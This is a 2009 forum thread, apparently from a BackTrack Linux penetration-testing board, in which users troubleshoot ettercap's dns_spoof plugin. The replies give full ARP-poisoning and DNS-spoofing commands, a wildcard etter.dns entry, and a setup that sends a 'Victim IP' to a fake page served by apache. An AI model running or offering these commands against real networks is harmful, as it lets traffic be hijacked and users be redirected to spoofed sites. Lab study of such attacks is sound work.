ettercap dns_spoof

**tigershark** · 07-28-2009, 01:22 PM

I am using ettercap and its dns_spoof plugin to redirect webpages from site a to site b.

when i run the command :
ettercap -T -Q -M arp:remote -i eth0 /192.168.22.1/ // -P dns_spoof
every thing seems to be fine i even get messages on the CLI like
"dns_spoof: [wordpress(dot)com] spoofed to [198.182.196.48]
but on my target pc the site is not spoofed meaning it still opens up wordpress

please help

**weed's** · 07-28-2009, 02:06 PM

have you set the configuration file called etter.dns in the /usr/share/ettercap/ directory ???

**tigershark** · 07-29-2009, 07:28 AM

yes, i have read all tuts and set the etter.dns, i also tried compiling a filter file eg: mycode.filter to mycode.ef and running the filter but still the same problem, please help.

**weed's** · 07-29-2009, 10:39 AM

Originally Posted by tigershark

yes, i have read all tuts and set the etter.dns, i also tried compiling a filter file eg: mycode.filter to mycode.ef and running the filter but still the same problem, please help.

mmmm sorry but I can't help you anymore

**sil3nce** · 07-29-2009, 01:00 PM

Same here , the DNS spoof isn't working for me ..
I opend a theard : hxxp://forums.remote-exploit.org/newbie-area/24981-dns-spoofing-ettercap-not-working.html
And I didn't got answers , maybe here I'll get .

**petabyte** · 07-29-2009, 02:01 PM

Are you using any antivir with firewall or net protection in your target pc?

**garymc1** · 07-29-2009, 09:46 PM

Try,

cd /usr/share/ettercap/
mv -f etter.dns etter.dns.old
kate etter.dns
* A 192.168.1.7

Replace 192.168.1.7 with your ip and save the file

Then run
ettercap -i eth0 -T -q -P dns_spoof -M ARP:remote // //

You will also need to have apache running with your fake web page what you want to be displayed

Hope this helps

**tigershark** · 07-30-2009, 08:24 AM

i have McAfee AV on my target pc running windows vista with a linksys router.
i did what graymc1 said and if i use a local apache server it kinda works (meaning yahoo comes up just before my custom page) but if i try to change the "IP" to a specifically binded website the target still gets yahoo

**garymc1** · 07-30-2009, 07:57 PM

If you want to redirect to a specific web page

cd /usr/share/ettercap/
mv -f etter.dns etter.dns.old
kate etter.dns
* A xx.xx.xx.xx www(dot)test(dot)com

Replace xx.xx.xx.xx with the IP of the web site and www(dot)test(dot)com with the web site address

ettercap -i eth0 -T -q -P dns_spoof -M ARP /gateway IP/ /Victim IP/

That should work

Cheers
Gary

**h401ms** · 07-31-2009, 07:43 AM

Maybe your pc has dns cache bcz just before you perform the attack you had visited the original wordpress.com, In windows open a cmd with admin and type "ipconfig /flushdns" .. Try DNS spoof with a domain you havent visited very recent. I am not sure about this..

BackTrack Linux - Penetration Testing Distribution

Thread: ettercap dns_spoof

Thread Tools

Search Thread

Display

ettercap dns_spoof

Posting Permissions